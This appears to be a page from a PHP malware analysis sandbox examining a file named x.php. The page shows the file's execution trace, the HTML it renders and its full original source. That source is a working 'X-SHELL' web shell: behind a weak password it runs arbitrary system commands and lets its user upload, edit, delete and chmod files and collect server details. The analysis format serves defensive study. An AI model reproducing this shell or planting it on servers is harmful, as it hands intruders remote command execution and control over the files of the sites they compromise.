2	206	0	0.007572	494312	fileowner	0		/var/www/html/uploads/x.php	42	1	'x.php'
2	206	1	0.007593	494344
2	206	R			1000
2	207	0	0.007610	494304	posix_getpwuid	0		/var/www/html/uploads/x.php	42	1	1000
2	207	1	0.007646	495120
2	207	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
1		A						/var/www/html/uploads/x.php	42	$own = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2	208	0	0.007693	494320	filegroup	0		/var/www/html/uploads/x.php	42	1	'x.php'
2	208	1	0.007707	494360
2	208	R			1000
2	209	0	0.007721	494320	posix_getgrgid	0		/var/www/html/uploads/x.php	42	1	1000
2	209	1	0.007761	494976
2	209	R			['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
1		A						/var/www/html/uploads/x.php	42	$grp = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2	210	0	0.007798	494400	realpath	0		/var/www/html/uploads/x.php	42	1	'.'
2	210	1	0.007813	494480
2	210	R			'/var/www/html/uploads'
2	211	0	0.007828	494512	realpath	0		/var/www/html/uploads/x.php	42	1	'.'
2	211	1	0.007841	494592
2	211	R			'/var/www/html/uploads'
2	212	0	0.007855	494576	realpath	0		/var/www/html/uploads/x.php	42	1	'.'
2	212	1	0.007868	494656
2	212	R			'/var/www/html/uploads'
2	213	0	0.007883	494960	realpath	0		/var/www/html/uploads/x.php	42	1	'.'
2	213	1	0.007895	495040
2	213	R			'/var/www/html/uploads'
2	214	0	0.007910	495088	realpath	0		/var/www/html/uploads/x.php	42	1	'x.php'
2	214	1	0.007923	495176
2	214	R			'/var/www/html/uploads/x.php'
2	215	0	0.007938	495344	get_color	1		/var/www/html/uploads/x.php	42	1	'x.php'
3	216	0	0.007950	495344	is_writable	0		/var/www/html/uploads/x.php	56	1	'x.php'
3	216	1	0.007965	495384
3	216	R			FALSE
3	217	0	0.007979	495344	is_writable	0		/var/www/html/uploads/x.php	56	1	'x.php'
3	217	1	0.007993	495384
3	217	R			FALSE
3	218	0	0.008006	495344	is_readable	0		/var/www/html/uploads/x.php	56	1	'x.php'
3	218	1	0.008019	495384
3	218	R			TRUE
2		A						/var/www/html/uploads/x.php	56	$c = ''
3	219	0	0.008064	495344	is_writable	0		/var/www/html/uploads/x.php	56	1	'x.php'
3	219	1	0.008078	495384
3	219	R			FALSE
3	220	0	0.008091	495344	is_readable	0		/var/www/html/uploads/x.php	56	1	'x.php'
3	220	1	0.008104	495384
3	220	R			TRUE
2	215	1	0.008131	495344
2	215	R			''
2	221	0	0.008145	495344	perms	1		/var/www/html/uploads/x.php	42	1	'x.php'
3	222	0	0.008156	495344	file_exists	0		/var/www/html/uploads/x.php	57	1	'x.php'
3	222	1	0.008171	495384
3	222	R			TRUE
3	223	0	0.008184	495344	fileperms	0		/var/www/html/uploads/x.php	57	1	'x.php'
3	223	1	0.008196	495384
3	223	R			33204
3	224	0	0.008209	495344	sprintf	0		/var/www/html/uploads/x.php	57	2	'%o'	33204
3	224	1	0.008222	495728
3	224	R			'100664'
3	225	0	0.008235	495664	substr	0		/var/www/html/uploads/x.php	57	2	'100664'	-4
3	225	1	0.008248	495760
3	225	R			'0664'
2	221	1	0.008262	495376
2	221	R			'0664'
2	226	0	0.008360	495344	realpath	0		/var/www/html/uploads/x.php	42	1	'.'
2	226	1	0.008376	495424
2	226	R			'/var/www/html/uploads'
2	227	0	0.008391	495600	realpath	0		/var/www/html/uploads/x.php	42	1	'x.php'
2	227	1	0.008404	495688
2	227	R			'/var/www/html/uploads/x.php'
2	228	0	0.008418	495600	perms	1		/var/www/html/uploads/x.php	42	1	'x.php'
3	229	0	0.008430	495600	file_exists	0		/var/www/html/uploads/x.php	57	1	'x.php'
3	229	1	0.008446	495640
3	229	R			TRUE
3	230	0	0.008459	495600	fileperms	0		/var/www/html/uploads/x.php	57	1	'x.php'
3	230	1	0.008471	495640
3	230	R			33204
3	231	0	0.008483	495600	sprintf	0		/var/www/html/uploads/x.php	57	2	'%o'	33204
3	231	1	0.008496	495984
3	231	R			'100664'
3	232	0	0.008509	495920	substr	0		/var/www/html/uploads/x.php	57	2	'100664'	-4
3	232	1	0.008522	496016
3	232	R			'0664'
2	228	1	0.008535	495632
2	228	R			'0664'
1	3	1	0.008559	494320
			0.008621	347160
TRACE END   [2023-02-13 01:08:32.456224]

Generated HTML code
<html><head><title>X-SHELL</title><style>body {background:#333333;color:#999999;font-size:9pt;font-family:sans-serif,cursive,sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:#79a317;}h1#nm{text-shadow:0px 0px 5px black;color:#79a317;}a {color:#999999;text-decoration:none;font-family:sans-serif,cursive,sans serif;}a:hover {color:#79a317;}hr {background:#999999;color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-size:13pt;}#menuB {background:#333333;box-shadow:0px 0px 10px black;border-radius:15px;padding:5px 20px 5px 20px;}table#moreI{font-size:9pt;background:#333333;border-radius:10px;box-shadow:0px 0px 10px black;padding:5px;position:fixed;bottom:40px;right:40px;display:none;}p#cp {font-size:11pt;}table#lt {font-size:10pt;}input#lt,input#sv {background:#333333;border-radius:10px;border:1px solid #999999;color:#999999;text-align:center;}input#ltb {background:rgba(0,0,0,0);border-radius:10px;color:#999999;box-shadow:0px 0px 1px #999999;border:0px solid rgba(0,0,0,0);}table#ft {font-size:9pt;padding:5px;border-radius:10px;box-shadow:0px 0px 10px black;}td#fh {border-bottom:1px solid #999999;padding-bottom:3px;}tr#fn:hover{box-shadow:0px 0px 5px black;}h3 {text-shadow:0px 0px 4px black;font-size:13pt;}textarea#edit {background:#333333;color:#999999;box-shadow:0px 0px 10px black;border-radius:10px;border:none;padding:10px;}</style><script type="text/javascript">function get_inf() {if(document.getElementById('moreI').style.display=="block"){document.getElementById('moreI').style.display="none"}else {document.getElementById('moreI').style.display="block";}} function xyn(id1,id2) {document.getElementById(id1).style.display="block";document.getElementById(id2).style.display="none";}</script></head><body><h1 id="n"><a href="?x=x"></a></h1><center><p id="menu"><span id="menuB">&lt;<a href="x.php">Home</a>&gt; &lt;<a href="?x=cmd&amp;d=" var="" www="" html"="">Command</a>&gt; &lt;<a href="?x=php&amp;d=" var="" www="" html"="">PHP</a>&gt; &lt;<a href="javascript:get_inf();">Info</a>&gt; &lt;<a href="?x=q">Logout</a>&gt; </span></p></center><center><p id="inf">||| <b><i><u>Software:</u></i></b> Apache/2.4.52 (Ubuntu)  |||  <b><i><u>Uname:</u></i></b> Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 |||<br>||| <b><i><u>User:</u></i></b> osboxes uid:1000 gid:1000 ||| <b><i><u>Safe Mode:</u></i></b> <font color="#ccff00">OFF</font> ||| <b><i><u>Directory: </u></i></b>/var/www/html |||</p></center><hr><table id="moreI"><tbody><tr><td>PHP Version</td><td> :&gt; </td><td> 7.2.34-37+ubuntu22.04.1+deb.sury.org+1</td></tr><tr><td>Zend Version</td><td> :&gt; </td><td> 3.2.0</td></tr><tr><td>Magic Quotes</td><td> :&gt; </td><td> <font color="#ccff00">OFF</font></td></tr><tr><td>Curl</td><td> :&gt; </td><td> <font color="crimson">ON</font></td></tr><tr><td>Register Globals</td><td> :&gt; </td><td> <font color="#ccff00">OFF</font></td></tr><tr><td>OpenBase Dir</td><td> :&gt; </td><td> <font color="#ccff00">OFF</font></td></tr><tr><td>MySQL</td><td> :&gt; </td><td> <font color="#ccff00">OFF</font></td></tr><tr><td>Gzip</td><td> :&gt; </td><td> <font color="crimson">ON</font></td></tr><tr><td>MsSQL</td><td> :&gt; </td><td> <font color="#ccff00">OFF</font></td></tr><tr><td>PostgreSQL</td><td> :&gt; </td><td> <font color="#ccff00">OFF</font></td></tr><tr><td>Oracle</td><td> :&gt; </td><td> <font color="#ccff00">OFF</font></td></tr><tr><td>Total Space</td><td> :&gt; </td><td> 216.08GB</td></tr><tr><td>Used Space</td><td> :&gt; </td><td> 183.28GB</td></tr><tr><td>Your IP</td><td> :&gt; </td><td> ::1</td></tr><tr><td>Server IP</td><td> :&gt; </td><td> ::1</td></tr><tr><td colspan="3" align="center"><a href="?x=phpinf" target="_blank">PHPInfo</a></td></tr></tbody></table><p align="center" id="cp"><a href="?d=/"></a>/<a href="?d=/var/">var</a>/<a href="?d=/var/www/">www</a>/<a href="?d=/var/www/html/">html</a>/</p><table width="90%" align="center" id="lt" cellpadding="0"><tbody><tr><td align="center"><form action="?d=/var/www/html" method="GET">Create Dir: <input type="hidden" name="d" value="/var/www/html" id="lt"><input type="text" value="" name="ndir" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d=" var="" www="" html"="" method="GET">Create File: <input type="hidden" value="/var/www/html" name="d" id="lt"><input type="hidden" value="c" name="x"><input type="text" value="" name="f" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?x=cmd&amp;d=/var/www/html" method="POST">Command: <input type="text" value="" name="cmd" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d=/var/www/html" method="POST" enctype="multipart/form-data">Upload: <input type="hidden" value="100000000" name="MAX_FILE_SIZE"><input type="file" name="upfile" id="ltb"> <input type="submit" value="Go" id="lt"></form></td></tr></tbody></table><br><table width="75%" align="center" id="ft"><tbody><tr><td id="fh"><b>Name</b></td><td id="fh" align="center"><b>Permissions</b></td><td id="fh" align="center"><b>Owner</b></td><td id="fh" align="center"><b>Options</b></td></tr><tr id="fn"><td id="fc"><span id="n."><a href="?d=/var/www/html">.</a></span><span id="r." style="display:none;"><form action="?d=/var/www/html" method="POST"><input type="hidden" value="/var/www/html" name="d"> <input type="text" value="." id="lt" name="new"><input type="hidden" value="." name="old"> <input type="submit" id="lt" value="Rename"> <input type="button" id="lt" value="Cancel" onclick="xyn('n.','r.');"></form></span><span id="d." style="display:none;"><form action="?d=/var/www/html" method="GET">Are you Sure?<input type="hidden" value="/var/www/html" name="deld"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onclick="xyn('n.','d.')"></form></span></td><td id="fc" align="center"><span id="h."><a href="javascript:xyn('c.','h.');"><font color="#ccff00">0777</font></a></span><span id="c." style="display:none;"><form action="?d=/var/www/html" method="GET"><input type="hidden" value="/var/www/html" name="df"><input type="text" value="0777" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onclick="xyn('h.','c.');"></form></span></td><td id="fc" align="center">root : root</td><td id="fc"></td></tr><tr id="fn"><td id="fc"><span id="n.."><a href="?d=/var/www">..</a></span><span id="r.." style="display:none;"><form action="?d=/var/www/html" method="POST"><input type="hidden" value="/var/www/html" name="d"> <input type="text" value=".." id="lt" name="new"><input type="hidden" value=".." name="old"> <input type="submit" id="lt" value="Rename"> <input type="button" id="lt" value="Cancel" onclick="xyn('n..','r..');"></form></span><span id="d.." style="display:none;"><form action="?d=/var/www/html" method="GET">Are you Sure?<input type="hidden" value="/var/www" name="deld"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onclick="xyn('n..','d..')"></form></span></td><td id="fc" align="center"><span id="h.."><a href="javascript:xyn('c..','h..');"><font color="#ccff00">0777</font></a></span><span id="c.." style="display:none;"><form action="?d=/var/www/html" method="GET"><input type="hidden" value="/var/www" name="df"><input type="text" value="0777" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onclick="xyn('h..','c..');"></form></span></td><td id="fc" align="center">root : root</td><td id="fc"></td></tr><tr id="fn"><td id="fc"><span id="nbeneri.se_malware_analysis"><a href="?x=c&amp;d=/var/www/html&amp;f=beneri.se_malware_analysis">beneri.se_malware_analysis</a></span><span id="rbeneri.se_malware_analysis" style="display:none;"><form action="?d=/var/www/html" method="POST"><input type="hidden" value="/var/www/html" name="d"> <input type="text" id="lt" value="beneri.se_malware_analysis" name="new"><input type="hidden" value="beneri.se_malware_analysis" name="old"><input type="submit" id="lt" value="Rename"><input type="button" id="lt" value="Cancel" onclick="xyn('nbeneri.se_malware_analysis','rbeneri.se_malware_analysis');"></form></span><span id="dbeneri.se_malware_analysis" style="display:none;"><form action="?d=/var/www/html" method="GET">Are you Sure?<input type="hidden" value="/var/www/html/beneri.se_malware_analysis" name="delf"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onclick="xyn('nbeneri.se_malware_analysis','dbeneri.se_malware_analysis')"></form></span></td><td id="fc" align="center"><span id="hbeneri.se_malware_analysis"><a href="javascript:xyn('cbeneri.se_malware_analysis','hbeneri.se_malware_analysis');"><font color="">0644</font></a></span><span id="cbeneri.se_malware_analysis" style="display:none;"><form action="?d=/var/www/html" method="GET"><input type="hidden" value="/var/www/html/beneri.se_malware_analysis" name="df"><input type="text" value="0644" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onclick="xyn('hbeneri.se_malware_analysis','cbeneri.se_malware_analysis');"></form></span></td><td id="fc" align="center">root : root</td><td id="fc" align="center"><a href="javascript:xyn('rbeneri.se_malware_analysis','nbeneri.se_malware_analysis')">[R]</a> <a href="javascript:xyn('dbeneri.se_malware_analysis','nbeneri.se_malware_analysis');">[D]</a></td></tr><tr id="fn"><td id="fc"><span id="nx.php"><a href="?x=c&amp;d=/var/www/html&amp;f=x.php">x.php</a></span><span id="rx.php" style="display:none;"><form action="?d=/var/www/html" method="POST"><input type="hidden" value="/var/www/html" name="d"> <input type="text" id="lt" value="x.php" name="new"><input type="hidden" value="x.php" name="old"><input type="submit" id="lt" value="Rename"><input type="button" id="lt" value="Cancel" onclick="xyn('nx.php','rx.php');"></form></span><span id="dx.php" style="display:none;"><form action="?d=/var/www/html" method="GET">Are you Sure?<input type="hidden" value="/var/www/html/x.php" name="delf"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onclick="xyn('nx.php','dx.php')"></form></span></td><td id="fc" align="center"><span id="hx.php"><a href="javascript:xyn('cx.php','hx.php');"><font color="">0664</font></a></span><span id="cx.php" style="display:none;"><form action="?d=/var/www/html" method="GET"><input type="hidden" value="/var/www/html/x.php" name="df"><input type="text" value="0664" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onclick="xyn('hx.php','cx.php');"></form></span></td><td id="fc" align="center">osboxes : osboxes</td><td id="fc" align="center"><a href="javascript:xyn('rx.php','nx.php')">[R]</a> <a href="javascript:xyn('dx.php','nx.php');">[D]</a></td></tr><tr id="fn"></tr></tbody></table><br><br><br></body></html>
Original PHP code
<?php
error_reporting(0);
$xyn='tunafeesh';
if(isset($_POST['pass'])) {if($_POST['pass']==$password) {setcookie($xyn, $_POST['pass'], time()+3600);} let_him_in();}
if(!empty($password) && !isset($_COOKIE[$xyn]) or ($_COOKIE[$xyn]!=$password)) {initiate(); die();}
$me=basename(__FILE__);$server_soft=$_SERVER["SERVER_SOFTWARE"];$uname=php_uname();$cur_user=get_current_user().' uid:'.getmyuid().' gid:'.getmygid();$safe_mode=ini_get('safe_mode');$safe_mode=($safe_mode)?('<font color:crimson>ON</font>'):('<font color=#ccff00>OFF</font>');$cwd=getcwd();$bckC='#333333';$txtC='#999999';
$start='<html><head><title>X-SHELL</title><style>body {background:'.$bckC.';color:'.$txtC.';font-size:9pt;font-family:sans-serif,cursive,sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:#79a317;}h1#nm{text-shadow:0px 0px 5px black;color:#79a317;}a {color:'.$txtC.';text-decoration:none;font-family:sans-serif,cursive,sans serif;}a:hover {color:#79a317;}hr {background:'.$txtC.';color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-size:13pt;}#menuB {background:'.$bckC.';box-shadow:0px 0px 10px black;border-radius:15px;padding:5px 20px 5px 20px;}table#moreI{font-size:9pt;background:'.$bckC.';border-radius:10px;box-shadow:0px 0px 10px black;padding:5px;position:fixed;bottom:40px;right:40px;display:none;}p#cp {font-size:11pt;}table#lt {font-size:10pt;}input#lt,input#sv {background:'.$bckC.';border-radius:10px;border:1px solid '.$txtC.';color:'.$txtC.';text-align:center;}input#ltb {background:rgba(0,0,0,0);border-radius:10px;color:'.$txtC.';box-shadow:0px 0px 1px '.$txtC.';border:0px solid rgba(0,0,0,0);}table#ft {font-size:9pt;padding:5px;border-radius:10px;box-shadow:0px 0px 10px black;}td#fh {border-bottom:1px solid '.$txtC.';padding-bottom:3px;}tr#fn:hover{box-shadow:0px 0px 5px black;}h3 {text-shadow:0px 0px 4px black;font-size:13pt;}textarea#edit {background:'.$bckC.';color:'.$txtC.';box-shadow:0px 0px 10px black;border-radius:10px;border:none;padding:10px;}</style><script type="text/javascript">function get_inf() {if(document.getElementById(\'moreI\').style.display=="block"){document.getElementById(\'moreI\').style.display="none"}else {document.getElementById(\'moreI\').style.display="block";}} function xyn(id1,id2) {document.getElementById(id1).style.display="block";document.getElementById(id2).style.display="none";}</script></head><body><h1 id="n"><a href="?x=x"></a></h1>';
$menu='<center><p id="menu"><span id="menuB"><<a href="'.$me.'">Home</a>> <<a href="?x=cmd&d="'.realpath('.').'">Command</a>> <<a href="?x=php&d="'.realpath('.').'">PHP</a>> <<a href="javascript:get_inf();">Info</a>> <<a href="?x=q">Logout</a>> </span></p></center>';$end='</body></html>';$inf='<center><p id="inf">||| <b><i><u>Software:</u></i></b> '.$server_soft.'  |||  <b><i><u>Uname:</u></i></b> '.$uname.' |||</br>||| <b><i><u>User:</u></i></b> '.$cur_user.' ||| <b><i><u>Safe Mode:</u></i></b> '.$safe_mode.' ||| <b><i><u>Directory: </i></b></u>'.$cwd.' |||</p></center><hr>';
print $start;print $menu;print $inf;
$moreI=array('PHP Version' => phpversion(),'Zend Version' => zend_version(),'Magic Quotes' => magic_quotes(),'Curl' => curl(),'Register Globals' => reg_globals(),'OpenBase Dir' => openbase_dir(),'MySQL' => myql(),'Gzip' => gzip(),'MsSQL' => mssql(),'PostgreSQL' => postgresql(),'Oracle' => oracle(),'Total Space' => h_size(disk_total_space('/')) ,'Used Space' => h_size(disk_free_space('/')),'Your IP' => $_SERVER['REMOTE_ADDR'],'Server IP' => $_SERVER['SERVER_ADDR']);print '<table id="moreI">'; foreach($moreI as $n => $v) {print '<td>'.$n.'</td><td> :> </td><td> '.$v.'</td><tr>';} print '<td colspan=3 align="center"><a href="?x=phpinf" target="_blank">PHPInfo</a></td></table>';
if(isset($_GET['d'])) {chdir($_GET['d']);}
if(isset($_REQUEST['x']))
{
	print '<p id="bck"><a href="?d='.realpath('.').'">BACK</a></p>';
	switch($_REQUEST['x'])
	{
		case 'c': if(isset($_POST['edit_form'])){$f=$_GET['f'];$e=fopen($f,'w') or print '<p id="nn">Error Opening File</p>';fwrite($e,$_POST['edit_form']) or print '<p id="nn">Couldn\'t Save File</p>';fclose($e);}print '<center><p>Editing '.$_GET['f'].' ('.perms($_GET['d'] . $_GET['f']).') .</p></br></br><form action="?x=c&d='.realpath('.').'&f='.$_GET['f'].'" method="POST"><textarea cols=90 rows=15 name="edit_form" id="edit">';if(file_exists($_GET['f'])){$c=file($_GET['f']);foreach($c as $l){print htmlspecialchars($l);}}print '</textarea></br></br><input type="submit" value="Save" id="sv"></form></center>';break;
		case 'cmd': print '</br></br><center><h3>Execute Command</h3><form action="?x=cmd&d='.realpath('.').'" method="POST"><input type="text" value="" name="cmd" id="lt">  <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">';if(isset($_POST['cmd'])) {$cmd=$_POST['cmd']; execute(exec_meth(),$cmd);}print '</textarea></center>';break;
		case 'php': print '</br></br><center><h3>PHP Code</h3><form action=?x=php&d="'.realpath('.').'" method="POST"><input type="text" value="" name="pcode" id="lt"> <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">';print '</textarea></center>';break;
		case 'phpinf': phpinfo();break;
		case 'q': setcookie($xyn,'',time()-3600);let_him_in();break;
		case 'x': print '</br></br></br><center><h1 id="nm"></h1><h3>Contacts: <a href="mailto:>COM"></a></h3><h3>Blog: <a href="https://dhenbhocil.my.id" target="_blank"></a></h3><h3>Tools: <a href="https://dhen-bhocil.my.id" target="_blank">X0MB13</a></h3></center>';break;
	}
}
else
{
	if(isset($_GET['d'])) {chdir($_GET['d']);}
	if(isset($_GET['ndir'])) {$d=$_GET['d'];$n=$_GET['ndir'];mkdir($d .DIRECTORY_SEPARATOR. $n);}
	if(isset($_POST['new'])) {$n=$_POST['new'];$o=$_POST['old'];$d=$_POST['d'];rename($d.DIRECTORY_SEPARATOR.$o,$d.DIRECTORY_SEPARATOR.$n);}
	if(isset($_GET['deld'])) {$d=$_GET['deld']; rmdir($d);}
	if(isset($_GET['delf'])) {$d=$_GET['delf']; unlink($d);}
	if(isset($_GET['ch'])) {$ch=$_GET['ch']; $d=$_GET['df']; chmod($d,$ch);}
	if(isset($_FILES['upfile']['name'])) {$d=realpath('.').DIRECTORY_SEPARATOR.basename($_FILES['upfile']['name']);move_uploaded_file($_FILES['upfile']['tmp_name'],$d);}
	print '<p align="center" id="cp">'.curpath('').'</p>';
	print '<table width=90% align="center" id="lt"cellpadding="0"><td align="center"><form action="?d='.realpath('.').'" method="GET">Create Dir: <input type="hidden" name="d" value="'.realpath('.').'" id="lt"><input type="text" value="" name="ndir" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d="'.realpath('.').'" method="GET">Create File: <input type="hidden" value="'.realpath('.').'" name="d" id="lt"><input type="hidden" value="c" name="x"><input type="text" value="" name="f" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?x=cmd&d='.realpath('.').'" method="POST">Command: <input type="text" value="" name="cmd" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d='.realpath('.').'" method="POST" enctype="multipart/form-data">Upload: <input type="hidden" value="100000000" name="MAX_FILE_SIZE"><input type="file" name="upfile" id="ltb"> <input type="submit" value="Go" id="lt"></form></td></table>';
	print '</br>';
	$filex=array();
	$dirx=array();
	print '<table width="75%" align="center" id="ft" ><td id="fh"><b>Name</b></td><td id="fh" align="center"><b>Permissions</b></td><td id="fh" align="center"><b>Owner</b></td><td id="fh" align="center"><b>Options</b></td><tr id="fn">';
	if($handle=opendir('.')) {while(false !== ($file=readdir($handle))) {if(is_dir($file)) {$dirx[] .= $file;} else {$filex[] .= $file;}}asort($filex);asort($dirx);$i=0;
	foreach($dirx as $file) {if(function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {$own=posix_getpwuid(fileowner($file)); $grp=posix_getgrgid(filegroup($file));} else {$own['name']='???'; $grp['name']='???';}  print '<td id="fc"><span id="n'.$file.'"><a href="?d='.realpath($file).'">'.$file.'</a></span><span id="r'.$file.'" style="display:none;"><form action="?d='.realpath('.').'" method="POST"><input type="hidden" value="'.realpath('.').'" name="d"> <input type="text" value="'.$file.'" id="lt" name="new"><input type="hidden" value="'.$file.'" name="old"> <input type="submit" id="lt" value="Rename"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'n'.$file.'\',\'r'.$file.'\');"></form></span><span id="d'.$file.'" style="display:none;"><form action="?d='.realpath('.').'" method="GET">Are you Sure?<input type="hidden" value="'.realpath($file).'" name="deld"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\'n'.$file.'\',\'d'.$file.'\')"></form></span></td><td id="fc" align="center"><span id="h'.$file.'"><a href="javascript:xyn(\'c'.$file.'\',\'h'.$file.'\');"><font color="'.get_color($file).'">'.perms($file).'</font></a></span><span id="c'.$file.'" style="display:none;"><form action="?d='.realpath('.').'" method="GET"><input type="hidden" value="'.realpath($file).'" name="df"><input type="text" value="'.perms($file).'" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h'.$file.'\',\'c'.$file.'\');"></form></span></td><td id="fc" align="center">'.$own['name'].' : '.$grp['name'].'</td>'; if($i==0 or $i==1) {print '<td id="fc"></td><tr id="fn">';} else {print '<td id="fc" align="center"><a href="javascript:xyn(\'r'.$file.'\',\'n'.$file.'\')">[R]</a> <a href="javascript:xyn(\'d'.$file.'\',\'n'.$file.'\')">[D]</a></td><tr id="fn">';} $i++;}
	foreach($filex as $file) {if(function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {$own=posix_getpwuid(fileowner($file)); $grp=posix_getgrgid(filegroup($file));} else {$own['name']='???'; $grp['name']='???';} print '<td id="fc"><span id="n'.$file.'"><a href="?x=c&d='.realpath('.').'&f='.$file.'">'.$file.'</a></span><span id="r'.$file.'" style="display:none;"><form action="?d='.realpath('.').'" method="POST"><input type="hidden" value="'.realpath('.').'" name="d"> <input type="text" id="lt" value="'.$file.'" name="new"><input type="hidden" value="'.$file.'" name="old"><input type="submit" id="lt" value="Rename"><input type="button" id="lt" value="Cancel" onClick="xyn(\'n'.$file.'\',\'r'.$file.'\');"></form></span><span id="d'.$file.'" style="display:none;"><form action="?d='.realpath('.').'" method="GET">Are you Sure?<input type="hidden" value="'.realpath($file).'" name="delf"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\'n'.$file.'\',\'d'.$file.'\')"></form></span></td><td id="fc" align="center"><span id="h'.$file.'"><a href="javascript:xyn(\'c'.$file.'\',\'h'.$file.'\');"><font color="'.get_color($file).'">'.perms($file).'</font></a></span><span id="c'.$file.'" style="display:none;"><form action="?d='.realpath('.').'" method="GET"><input type="hidden" value="'.realpath($file).'" name="df"><input type="text" value="'.perms($file).'" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h'.$file.'\',\'c'.$file.'\');"></form></span></td><td id="fc" align="center">'.$own['name'].' : '.$grp['name'].'</td><td id="fc" align="center"><a href="javascript:xyn(\'r'.$file.'\',\'n'.$file.'\')">[R]</a> <a href="javascript:xyn(\'d'.$file.'\',\'n'.$file.'\');">[D]</a></td><tr id="fn">';}}
	print '</table></br></br></br>';
}
function openbase_dir(){$x=ini_get('open_basedir');if(!$x) {$o='<font color=#ccff00>OFF</font>';}else {$o='<font color=crimson>ON</font>';}return($o);}
function magic_quotes(){$x=get_magic_quotes_gpc();if(empty($x)) {$m='<font color=#ccff00>OFF</font>';}else {$m='<font color=crimson>ON</font>';}return($m);}
function curl(){if(extension_loaded('curl')) {$c='<font color=crimson>ON</font>';}else {$c='<font color=#ccff00>OFF</font>';}return($c);}
function reg_globals(){if(ini_get('reqister_globals')) {$r='<font color=crimson>ON</font>';}else {$r='<font color=#ccff00>OFF</font>';}return($r);}
function oracle(){if(function_exists('ocilogon')) {$o='<font color=crimson>ON</font>';}else {$o='<font color=#ccff00>OFF</font>';}return($o);}
function postgresql(){if(function_exists('pg_connect')) {$p='<font color=crimson>ON</font>';}else {$p='<font color=#ccff00>OFF</font>';}return($p);}
function myql(){if(function_exists('mysql_connect')) {$m='<font color=crimson>ON</font>';}else {$m='<font color=#ccff00>OFF</font>';}return($m);}
function mssql(){if(function_exists('mssql_connect')) {$m='<font color=crimson>ON</font>';}else {$m='<font color=#ccff00>OFF</font>';}return($m);}
function gzip(){if(function_exists('gzencode')) {$m='<font color=crimson>ON</font>';}else {$m='<font color=#ccff00>OFF</font>';}return($m);}
function h_size($s){if($s>=1073741824) {$s=round($s/1073741824*100)/100 .'GB';}elseif($s>=1048576) {$s=round($s/1048576*100)/100 .'MB';}elseif($s>=1024) {$s=round($s/1024*100)/100 .'KB';}else {$s=$s.'B';}return($s);}
function curpath($d){if($d=='') {$d=getcwd();}$p='';$n='';$dx=explode(DIRECTORY_SEPARATOR,$d);for($i=0;$i < count($dx);$i++) {$g=$dx[$i];$p.=$dx[$i] . DIRECTORY_SEPARATOR; $n .='<a href="?d='.$p.'">'.$g.'</a>'.DIRECTORY_SEPARATOR;}return($n);}
function get_color($f){if(is_writable($f)) {$c='#ccff00';}if(!is_writable($f) && is_readable($f)) {$c=''.$txtC.'';}if(!is_writable($f) && !is_readable($f)) {$c='crimson';}return($c);}
function perms($f) {if(file_exists($f)) {return substr(sprintf('%o',fileperms($f)), -4);} else {return '???';}}
function exec_meth() {if(function_exists('passthru')) {$m='passthru';} if(function_exists('exec')) {$m='exec';} if(function_exists('shell_exec')) {$m='shell_exec';} if(function_exists('system')) {$m='system';} if(!isset($m)) {$m='Disabled';} return($m);}
function execute($m,$c) {if($m=='passthru') {passthru($c);} elseif($m=='system') {system($c);} elseif($m=='shell_exec') {print shell_exec($c);} elseif($m=='exec') {exec($c,$r); foreach($r as $o) {print $o.'</br>';}} else {print 'dafuq?';}}
function initiate(){print '<table border=0 width=100% height=100% align=center style="background:#333333;color:silver;"><td valign="middle"><center><form action="'.basename(__FILE__).'" method="POST">Password <input type="password" maxlength="10" name="pass" style="background:#333333;color:silver;border-radius:10px;border:1px solid silver;text-align:center;"> <input type="submit" value=">>" style="background:#333333;color:silver;border-radius:10px;border:1px solid silver;"></form></center></td></table>';}
function let_him_in() { header("Location: ".basename(__FILE__)); }
print $end;
?>
PHP Malware Analysis

x.php

md5: 48c024b498b86674e3340be03f21e3f5

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
